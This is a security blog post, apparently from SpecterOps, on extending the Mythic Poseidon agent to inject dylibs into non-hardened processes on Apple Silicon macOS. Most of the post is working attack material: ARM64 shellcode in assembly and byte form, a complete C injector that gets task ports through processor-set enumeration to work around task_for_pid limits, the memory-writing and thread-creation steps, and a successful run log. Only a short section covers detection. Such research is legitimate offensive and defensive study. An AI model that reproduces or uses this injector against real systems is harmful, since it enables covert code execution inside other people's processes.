ARM-ed and Dangerous: Dylib Injection on macOS

Aug 21 2025

By: West Shepherd • 24 min read

Modern Dylib Injection Techniques for AArch64 macOS

TL;DR This post details how I extended the Mythic Poseidon agent to support ARM64 Dylib injection on Apple Silicon. The method leverages Mach APIs to enumerate processor sets, obtain task ports, and inject ARM64 shellcode that loads dynamic libraries (i.e., Dylibs) into non-hardened macOS processes. Full technical details are provided, including shellcode construction, memory allocation, runtime patching, and thread creation. Readers will gain insight into working around task_for_pid() restrictions with processor set enumeration and how defenders can detect these techniques in the wild.

Introduction

Modern macOS security controls have significantly raised the bar for process injection. Features like System Integrity Protection (SIP), Hardened Runtime, and Pointer Authentication Codes (PAC) enforce restrictions that block most familiar techniques. These defenses make it nearly impossible to inject into hardened applications, yet one method remains effective for certain non-hardened targets. Dylib injection using Mach ports still offers a practical approach under specific conditions.

In this post, I share how I extended the Poseidon agent for Mythic to support Dylib injection in Apple Silicon. The original macOS agent only included Dylib injection functionality for Intel AMD64 platforms. To achieve parity on AArch64, I implemented the same exploit logic and developed a shellcode stager in ARM64 assembly. This journey explores the technical details, from understanding the Mach API to implementing the injection process step by step.

The Dylib Injection Technique

Before diving into the specifics of ARM64 support, it is important to revisit the core concept of Dylib injection. This technique enables dynamic modification of a running process by loading an external shared library into its memory space.

The injection process involves three primary steps: memory allocation within the target process, creating a new thread, and deploying shellcode that carries out the actual loading of the Dylib. While these steps are similar to Poseidon’s AMD64 implementation, adding ARM64 support introduced new challenges, particularly around architectural differences and calling conventions.

With this foundation established, we can now examine the Mach primitives that make this possible on macOS.

Understanding the Mach Context

The Mach kernel forms the backbone of macOS process management. It provides abstractions like tasks and ports that enable inter-process communication and memory manipulation. A task represents a kernel-level execution environment for a process and ports are kernel-managed communication channels for exchanging messages.

To perform Dylib injection, we need access to the target task’s port. The task_for_pid() API was historically the go-to solution for obtaining this access. However, SIP now enforces strict limitations, allowing its use only by processes with specific entitlements and Apple signatures.

Instead, we leverage a less common approach. By using host-level privileges, we can enumerate processor sets and retrieve task ports indirectly. This method avoids SIP’s direct enforcement while enabling the use of functions like mach_vm_write() and thread_create_running() later in the injection process.

Having outlined the necessary Mach context, the next step is to prepare a suitable environment for building and testing the injection logic.

Environment and Setup

If you already have an environment setup, feel free to skip to the next section

Developing and testing this injection technique requires a controlled environment. For this walkthrough, I used a Mac mini running macOS 15 (Sequoia). SIP was enabled to simulate realistic conditions, and Gatekeeper was temporarily disabled to allow testing of unsigned binaries.However, it’s worth noting that Gatekeeper will allow ad-hoc signed binaries to run if they are signed locally on the macOS system, which can be a safer alternative to disabling Gatekeeper entirely (e.g., codesign -f -s - ./binary).

The setup also requires Xcode, along with Homebrew’s binutils and coreutils packages. Root access is necessary throughout the process to perform operations like memory allocation and thread creation in a remote process.

With the environment ready, we can move on to creating a test Dylib that serves as the payload for injection.

Creating the Test Dylib

The test Dylib provides a simple way to confirm successful injection. Its purpose is to perform an observable action upon loading, verifying that the injection worked as intended. The following code defines inject_dylib.c.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>#include <unistd.h>
#include <sys/mman.h>
#include <mach/mach.h>

__attribute__((constructor))
void injected() {
    printf("[+] Successfully injected into process! PID: %d\n", getpid());
    system("touch /tmp/injected_success");  // Create a file to confirm execution
}

Compile the Dylib using the following clang command.

admin@[libinject]> clang -shared \  -o inject_dylib.dylib inject_dylib.c \  -framework Foundation \  -arch arm64 -fPIC

With the Dylib compiled, we need a target process for testing the injection.

Creating a Persistent Test Process

To simplify testing, we will create a lightweight application named inject_target.c. This application runs indefinitely, making it an ideal target for demonstrating injection.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    printf("[+] Test process started. PID: %d\n", getpid());
    while (1) {
        sleep(1);  // Keep the process running
    }
    printf("[+] Done sleeping, exiting process\n");
    return 0;
}

Next, compile the test application.

admin@[libinject]> clang -o inject_target inject_target.c
admin@[libinject]> file inject_target

inject_target: Mach-O 64-bit executable arm64

With both the test Dylib and target process prepared, we can now explore the ARM64 shellcode that performs the actual injection.

ARM64 Shellcode

This shellcode replicates Poseidon’s AMD64 functionality for Apple Silicon. It carries out three operations entirely in memory: spawning a new thread, loading the Dylib, and terminating the thread.

The shellcode was written in ARM64 assembly to account for architectural differences such as register usage and calling conventions. Let’s break it down step by step.

Shellcode Breakdown

The ARM64 shellcode begins with a prologue that prepares the stack and preserves critical registers. This setup ensures that subsequent operations maintain proper alignment and do not disrupt the calling conventions of the target process.

.global _main
.align 2
.text

_main:
    ; === Prologue ===
    ; Allocate 32 bytes on the stack to store local variables and maintain alignment
    sub sp, sp, #32
    ; Save frame pointer (x29) and link register (x30) to stack at offset 16
    stp x29, x30, [sp, #16]
    ; Set x29 (frame pointer) to the new stack position for stack frame tracking
    add x29, sp, #16

Thread Creation

After setting up the stack, the shellcode prepares arguments for pthread_create_from_mach_thread(). This function creates a new thread within the target process. The thread executes a secondary routine called _start_routine.

; === Prepare Arguments for pthread_create_from_mach_thread ===
; int pthread_create_from_mach_thread(
;     pthread_t *thread,             // x0 (SP pointer to thread)
;     const pthread_attr_t *attr,    // x1 (NULL pointer to thread attributes)
;     void *(*start_routine)(void*), // x2 (Pointer to _start_routine)
;     void *arg                      // x3 (NULL pointer to start_routine data)
; );

; Set x0 to point to the stack (thread reference pointer)
mov x0, sp                      
; Set x1 to zero (NULL pointer for pthread attributes)
mov x1, xzr                     
; Load address of the new thread's start_routine function 
adr x2, _start_routine          
; Set x3 to zero (NULL pointer, no arguments passed to _start_routine)
mov x3, xzr                     
; Load function address of pthread_create_from_mach_thread into x4
ldr x4, _pthread_create_from_mach_thread 
; Call pthread_create_from_mach_thread(), which creates a new thread
blr x4

After creating the thread, the shellcode enters an infinite loop. This prevents the main thread from returning and allows the injected thread to execute independently.

_jump:
    ; === Infinite Loop to Prevent Returning to Caller ===
    ; This ensures execution stays within the new thread.
    ; Busy wait loop to prevent execution from proceeding in the main thread
    b _jump

The _start_routine function carries out the actual work of loading the Dylib. It calls dlopen() to load the specified library, then terminates cleanly using pthread_exit().

_start_routine:
    ; === Start Routine: Load and Execute Dylib ===
    ; This function runs in the new thread and loads a dynamic library.

    ; void *dlopen(
    ;     const char *filename,     // x0 (Pointer to library path)
    ;     int flag                  // x1 (Loading flags RTLD_LAZY (1))
    ; );

    ; Load address of _dylib string (path to the library) into x0
    adr x0, _dylib                 
    ; Set x1 to 1 (RTLD_LAZY flag for dlopen)
    mov x1, #1                     
    ; Load function address of dlopen into x7
    ldr x7, _dlopen                
    ; Call dlopen(), loading the specified dylib into memory
    blr x7                          

    ; === Call pthread_exit to Terminate the Thread ===
    ; void pthread_exit(void *retval);
    
    ; Load function address of pthread_exit into x8
    ldr x8, _pthread_exit              
    ; Set x0 to 0 (exit code)
    movz x0, #0                         
    ; Call pthread_exit(), terminating the thread
    blr x8

To support dynamic behavior, we will utilize the data section to store the shellcode placeholders PTHRDCRT, DLOPEN__, PTHREXIT__, and LIBLIBLIB. These are patched at runtime with resolved function addresses and the actual Dylib path.

; === Data Section ===
; These labels hold function addresses and the path to the library being injected.

; Placeholder for address of pthread_create_from_mach_thread
_pthread_create_from_mach_thread: .ascii  "PTHRDCRT"
; Placeholder for address of dlopen
_dlopen:                          .ascii  "DLOPEN__"
; Placeholder for address of pthread_exit
_pthread_exit:                    .ascii  "PTHREXIT"
; Library path placeholder
_dylib:                           .ascii  "LIBLIBLIB\0\...[62 null bytes]...\0"

With the shellcode logic understood, we can now examine how it is compiled and integrated into the injection process.

Generating Shellcode Bytes

After authoring the shellcode, it must be compiled and converted into a format that the injection code can use. The following commands assemble the shellcode, link it into a binary, extract raw bytes, and format them as a C-compatible array.

admin@[libinject]> as -arch arm64 shellcode.asm -o shellcode.o && \
  ld -o shellcode shellcode.o && \
  objcopy -O binary shellcode shellcode.bin && \
  hexdump -v -e '"\\"x" 1/1 "%02x" ""' shellcode.bin > shellcode.txt

This process produces a flat text file of hexadecimal opcodes. These opcodes are imported into the C code as a static template called shellcode_template.

By using a template that is copied and patched during each injection, we avoid reusing modified shellcode. Reuse could lead to corrupted placeholders and unpredictable results.

Implementing the Shellcode in C

The final product is the C shellcode array shellcode_template, which serves as a base for the injection payload. It contains the compiled ARM64 opcodes, along with placeholder strings for function pointers and the Dylib path.

char shellcode_template[] =
  //0000000100003f00 <_main>:
  "\xff\x83\x00\xd1"  // sub     sp, sp, #0x20
  "\xfd\x7b\x01\xa9"  // stp     x29, x30, [sp, #0x10]
  "\xfd\x43\x00\x91"  // add     x29, sp, #0x10
  "\xe0\x03\x00\x91"  // mov     x0, sp (pthread_t *thread)
  "\xe1\x03\x1f\xaa"  // mov     x1, xzr (const pthread_attr_t *attr)
  "\xa2\x00\x00\x10"  // adr     x2, _start_routine (void *(*start_routine)(void*))
  "\xe3\x03\x1f\xaa"  // mov     x3, xzr (void *arg)
  "\x44\x01\x00\x58"  // ldr     x4, _pthread_create_from_mach_thread
  "\x80\x00\x3f\xd6"  // blr     x4 (call pthread_create_from_mach_thread())
  //0000000100003f24 <_jump>:
  "\x00\x00\x00\x14"  // b       _jump (jump 0)
  //0000000100003f28 <_start_routine>:
  "\xa0\x01\x00\x10"  // adr     x0, _dylib (const char *filename))
  "\x21\x00\x80\xd2"  // mov     x1, #0x1 (int flag (RTLD_LAZY)) 
  "\xe7\x00\x00\x58"  // ldr     x7, _dlopen
  "\xe0\x00\x3f\xd6"  // blr     x7 (call dlopen())
  "\xe8\x00\x00\x58"  // ldr     x8, _pthread_exit
  "\x00\x00\x80\xd2"  // mov     x0, #0x0 (void *retval)
  "\x00\x01\x3f\xd6"  // blr     x8  (call pthread_exit())
  //0000000100003f44 <_pthread_create_from_mach_thread>:
  "PTHRDCRT"          // _pthread_create_from_mach_thread +18
  "DLOPEN__"          // _dlopen                          +19
  "PTHREXIT"          // _pthread_exit                    +20
  "LIBLIBLIB"         // _dylib                           +21
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00";

During runtime, the injector searches for these placeholders in memory and replaces them with actual addresses and strings. This ensures the shellcode operates correctly within the target process.

Having covered the shellcode implementation, we can now shift focus to the injection process itself.

Dylib Injection Exploit Code

Replicating Task for PID

The injection routine (libinject_darwin_arm64.c) begins with the challenge of obtaining a task port for the target process. Since SIP blocks task_for_pid() unless the binary has Apple entitlements, the injector uses a custom task_for_pid_wrapper() function. This function takes an indirect approach, relying on processor set enumeration and host-level privileges to retrieve task ports.

Obtaining the Host Privileged Port

The first step is to retrieve the host privileged port using host_get_host_priv_port(). This port is required for advanced Mach-based system queries and is only available to processes running as root or signed with specific entitlements — such as com.apple.private.kernel.system-task-access, com.apple.private.mach-priv, or com.apple.system-task-ports.

host_t host_priv;
host_get_host_priv_port(mach_host_self(), &host_priv);

Getting the Default Processor Set

Processor sets are kernel objects that group CPUs and their associated tasks. Once the host privileged port is available, the injector calls processor_set_default() to obtain a handle to the system’s default processor set.

mach_port_t ps_default;
kern_return_t kr;
kr = processor_set_default(host_priv, &ps_default);

Enumerating Processor Sets

The injector then uses host_processor_sets() to retrieve a list of all processor sets on the system. This enumeration provides entry points for later task enumeration.

processor_set_name_array_t *psets = malloc(1024);
mach_msg_type_number_t pset_count;
kr = host_processor_sets(host_priv, psets, &pset_count);

Obtaining Privileges Over the Processor Set

To enumerate the tasks within a processor set, the injector calls host_processor_set_priv() to request control access to the default processor set. This step is critical because it enables the use of processor_set_tasks().

mach_port_t ps_default_control;
kr = host_processor_set_priv(host_priv, ps_default, &ps_default_control);if (kr != KERN_SUCCESS) {
    display_error("Failed to set privileges with host_processor_set_priv", kr);
    mach_error("host_processor_set_priv", kr);
    return 0;
}

Retrieving All Task Ports

With control access granted, the injector uses processor_set_tasks() to obtain an array of task ports for all processes in the system. Unlike task_for_pid(), this method is not subject to SIP’s direct enforcement.

mach_msg_type_number_t num_tasks;
task_array_t tasks;
num_tasks = 1000;
kr = processor_set_tasks(ps_default_control, &tasks, &num_tasks);if (kr != KERN_SUCCESS) {
    display_error("Failed to set tasks with processor_set_tasks", kr);
    return 0;
}

The tasks array now contains task ports for every process.

Matching the Target Process

The injector iterates over the retrieved task ports and uses pid_for_task() to compare each task’s PID to the target PID. When a match is found, the corresponding task port is returned.

for (int i = 0; i < num_tasks; i++) {
    int target_pid;
    pid_for_task(tasks[i], &target_pid);
    if (target_pid == pid) {
        printf("[+] Got task=%d for pid=%d\n", tasks[i], pid);
        return tasks[i];
    }
}

This sequence effectively replicates the functionality of task_for_pid() without requiring Apple’s entitlements.

Why This Approach Works Despite SIP

Although SIP blocks task_for_pid() for protected processes, it does not impose equivalent restrictions on querying processor sets. By first obtaining host privileges, the injector accesses a more permissive control path to enumerate tasks and identify the one associated with the target PID.

This method does not bypass SIP entirely. Instead, it exploits the fact that processor set APIs remain exposed to processes running as root.

Mach-O Manipulation

With the task port for the target process secured, the next phase focuses on preparing the memory space for the injection payload. This involves allocating memory regions within the target process, configuring them appropriately, and writing the ARM64 shellcode. Proper alignment and protection settings are critical here to avoid crashing the target or triggering security mechanisms.

Allocating Memory in the Target Process

Once the target task port is obtained, the injector allocates memory in the remote process. Two regions are allocated: one for the shellcode and one for the thread’s stack. Both allocations use mach_vm_allocate() with the VM_FLAGS_ANYWHERE flag, allowing the kernel to select suitable addresses.

mach_vm_address_t remote_stack = 0;
mach_vm_address_t remote_code = 0;

kr = mach_vm_allocate(remote_task, &remote_stack, STACK_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  display_error("Failed to allocate space", kr);
  return -2;
}
printf("[+] Stack allocated at address: 0x%llx\n", remote_stack);

// Allocate the remote code region
kr = mach_vm_allocate(remote_task, &remote_code, CODE_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  display_error("Failed to allocate code memory", kr);
  return -2;
}
printf("[+] Code allocated at address: 0x%llx\n", remote_code);

The allocated stack is sized at 0x4000 bytes, which is sufficient for the minimal operations the injected thread performed.

Resolving Function Addresses

The injector resolves the addresses of critical functions at runtime. These functions include pthread_create_from_mach_thread(), dlopen(), and pthread_exit(). Resolved pointers are later used to patch the placeholders in the shellcode template.

uint64_t addr_of_pthread = (uint64_t)dlsym(
  RTLD_DEFAULT, 
  "pthread_create_from_mach_thread"
);
uint64_t addr_of_pexit = (uint64_t)dlsym(
  RTLD_DEFAULT, 
  "pthread_exit"
);uint64_t addr_of_dlopen = (uint64_t)dlopen;

If any of these lookups fail, the injector aborts to avoid corrupting the remote process with invalid addresses.

Patching the Shellcode Template

With function addresses resolved, the injector allocates a fresh copy of the shellcode_template array, then searches for placeholders within the array. Each placeholder is replaced with the corresponding function pointer or the full path to the target Dylib.

size_t shellcode_size = sizeof(shellcode_template);
char *shellcode = malloc(shellcode_size);
if (!shellcode) {
    perror("[-] Failed to allocate memory for shellcode\n");
    return -1;
}
memcpy(shellcode, shellcode_template, shellcode_size);
printf("[+] Patching shellcode\n");
char *possible_patch_location = (shellcode);
for (int i = 0; i < 0x100; i++) {
  possible_patch_location++;
  if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
    memcpy(possible_patch_location, &addr_of_pthread, sizeof(uint64_t));
    printf("[+] Patched pthread_create_from_mach_thread() with address: 0x%llx\n", addr_of_pthread);
  }
  if (memcmp(possible_patch_location, "PTHREXIT", 8) == 0) {
    memcpy(possible_patch_location, &addr_of_pexit, sizeof(uint64_t));
    printf("[+] Patched pthread_exit() with address: 0x%llx\n", addr_of_pexit);
  }
  if (memcmp(possible_patch_location, "DLOPEN__", 6) == 0) {
    memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
    printf("[+] Patched dlopen() with address: 0x%llx\n", addr_of_dlopen);
  }
  if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
    strcpy(possible_patch_location, lib);
    printf("[+] Patched library with path: %s\n", lib);
  }
}
printf("[+] Shellcode patched\n");

This dynamic patching ensures that the shellcode has accurate references for the current process and Dylib being injected.

Writing the Shellcode to the Target Process

After patching, the injector writes the modified shellcode into the allocated memory region of the target process using mach_vm_write().

printf("[+] Writing shellcode to memory\n");
kr = mach_vm_write(remote_task, remote_code, (vm_address_t)shellcode, CODE_SIZE);
if (kr != KERN_SUCCESS) {
  display_error("Failed to write shellcode", kr);
  return -3;
}
printf("[+] Shellcode written to address: 0x%llx\n", remote_code);

Set Memory Protections for Execution and Stack Use

To prepare the shellcode for execution, the memory protections of the code and stack regions update. The code region is marked read and execute (RX), while the stack region is set to read and write (RW).

printf("[+] Setting code region to RX permissions\n");
kr = vm_protect(
  remote_task,
  remote_code,
  CODE_SIZE,
  FALSE,
  VM_PROT_READ | VM_PROT_EXECUTE
);
if (kr != KERN_SUCCESS) {
  display_error("Failed to set code RX", kr);
  return -4;
}

printf("[+] Setting stack region to RW permissions\n");
kr = vm_protect(
  remote_task,
  remote_stack,
  STACK_SIZE,
  TRUE,
  VM_PROT_READ | VM_PROT_WRITE
);
if (kr != KERN_SUCCESS) {
  display_error("Failed to set stack RW", kr);
  return -4;
}

These protections are critical because macOS blocks executing shellcode from a writable memory region on hardened processes.

Launching the Remote Thread

The final step involves creating a new thread in the target process that begins execution at the shellcode entry point. This is done using thread_create_running().

printf("[i] Setting remote registers\n");
remote_stack += (STACK_SIZE / 2);
arm_thread_state64_t state;
state.__pc = (uintptr_t)remote_code;
state.__sp = (uintptr_t)remote_stack;
state.__fp = (uintptr_t)remote_stack;

printf("[+] Spawning thread\n");
thread_act_t thread;
kr = thread_create_running(
   remote_task,
   ARM_THREAD_STATE64,
   (thread_state_t)&state,
   ARM_THREAD_STATE64_COUNT,
   &thread
);
if (kr != KERN_SUCCESS) {
  display_error("Failed to spawn thread", kr);
  return -3;
}
printf("[+] Finished injecting into pid=%d with dylib=%s\n", pid, lib);
return 0;

At this point, the new thread is active within the target process and executes the ARM64 shellcode, which spawns another thread to load the Dylib.

Payload Execution

With the injection routine in place, the next step is to test it against the persistent test process. Start by launching the target application in the background. This process will run indefinitely, waiting for the injection to occur.

admin@[libinject]> ./inject_target &
[4] 79530
admin@[libinject]> [+] Test process started. PID: 79530

Once the target process is running, compile then invoke the injector binary as root. Pass the process ID (PID) of the target application and the full path to the test Dylib.

The injector will display status messages as it progresses through key stages such as task port acquisition, memory allocation, shellcode patching, and thread creation.

admin@[libinject]> clang libinject_darwin_arm64.c -framework Foundation \
-o libinject_darwin_arm64 -arch arm64 -framework Security

admin@[libinject]> sudo ./libinject_darwin_arm64 $(pgrep inject_target) /tmp/inject_dylib.dylib

[+] Running libinject_darwin_arm64
[+] Got task=8195 for pid=79530[+] Stack allocated at address: 0x1025c0000
[+] Code allocated at address: 0x1025d0000
[+] Patching shellcode
[+] Patched pthread_create_from_mach_thread() with address: 0x187d39b28
[+] Patched dlopen() with address: 0x187d404f4
[+] Patched pthread_exit() with address: 0x187d35954
[+] Patched library with path: /tmp/inject_dylib.dylib
[+] Shellcode patched[+] Writing shellcode to memory
[+] Shellcode written to address: 0x1025d0000
[+] Setting code region to RX permissions
[+] Setting stack region to RW permissions
[i] Setting remote registers
[+] Spawning thread
[+] Finished injecting into pid=79530 with dylib=/tmp/inject_dylib.dylib
[+] Injection successful!

admin@[libinject]>
[+] Successfully injected into process! the PID: 79530

After the injection completes, confirm that the test Dylib executed successfully by checking for the artifact its constructor created.

admin@[libinject]> ls /tmp/injected_success/tmp/injected_success

If the file exists, it confirms that the Dylib was loaded into the target process and executed as intended.

Detection

Although this injection technique avoids using task_for_pid() and does not leave shellcode binaries on disk, it is not fully stealthy. The injected Dylib must exist on disk for dlopen() to load it. This requirement creates opportunities for defenders to detect unauthorized activity.

Apple’s Hardened Runtime and SIP protections already block unsigned Dylibs from loading into hardened processes. Ensuring these defenses are enabled, along with enforcing strict code signing policies, provides strong mitigation against this technique.

Conclusion

ARM64 Dylib injection on macOS demonstrates both the power of Mach APIs and the persistent challenges of securing dynamic operating systems. Apple’s ongoing improvements to SIP and code signing raised the bar for attackers, but non-hardened applications remain exposed.

For red team operators, this technique provides a practical method of gaining code execution on non-hardened targets in Apple Silicon environments. For defenders, understanding the mechanics of this injection process is essential to detecting and mitigating similar threats in the wild.

Shout Out

Special thanks to Angelo DeLuca and Erhad Husovic from NSoft for their excellent work on the ReverseApple project, which provided valuable insight into ARM64 injection techniques. Additional credit goes to Leo Pitt for the blog post “Dylib Loads that Tickle Your Fancy,” Cody Thomas, and to Chris Ross for his foundational work on the Poseidon agent. Their contributions helped shape the direction of this research.

References / Resources

L. Pitt, “Dylib Loads That Tickle your Fancy,” SpecterOps, Aug. 2022. [Online]. Available: https://posts.specterops.io/dylib-loads-that-tickle-your-fancy-d25196addd8c
Apple Inc., “Apple Developer Documentation.” [Online]. Available: https://developer.apple.com/documentation/
Apple Inc., “Mach-O Programming Guide.” [Online]. Available: https://developer.apple.com/library/archive/documentation/
W. Shepherd, “libinject_darwin_arm64.c,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/f792cac61a1b51d3d96ade6a917819ff
W. Shepherd, “libinject_darwin_arm64.h,” SpecterOps. [Online]. Available: https://gist.github.com/westshepherd/cfcb9ecf7f9e2aa96e5884a0526ccba7
Mythic – Poseidon Agent on AMD64 macOS, SpecterOps. [Online]. Available: https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agent_code/libinject/libinject_darwin_amd64.c
A. DeLuca and E. Husovic, “inject_aarch64,” NSoft, GitHub Repository, 2023. [Online]. Available: https://github.com/ReverseApple/inject_aarch64

Post Views: 3,143

ARM-ed and Dangerous: Dylib Injection on macOS

Aug 21 2025

Share

By: West Shepherd • 24 min read

Introduction

The Dylib Injection Technique

Understanding the Mach Context

Environment and Setup

ARM64 Shellcode

Shellcode Breakdown

Generating Shellcode Bytes

Dylib Injection Exploit Code

Replicating Task for PID

Mach-O Manipulation

Payload Execution

Detection

Conclusion

Shout Out

References / Resources

Sign Up For Updates From SpecterOps

Share

By: West Shepherd • 24 min read

Introduction

The Dylib Injection Technique

Understanding the Mach Context

Environment and Setup

ARM64 Shellcode

Shellcode Breakdown

Generating Shellcode Bytes

Dylib Injection Exploit Code

Replicating Task for PID

Mach-O Manipulation

Payload Execution

Detection

Conclusion

Shout Out

References / Resources

By: John Wotton

Oct 3, 2025 • 12 min read

By: Garrett Foster

Oct 1, 2025 • 15 min read

By: Craig Wright

Sep 29, 2025 • 14 min read

Sign Up For Updates From SpecterOps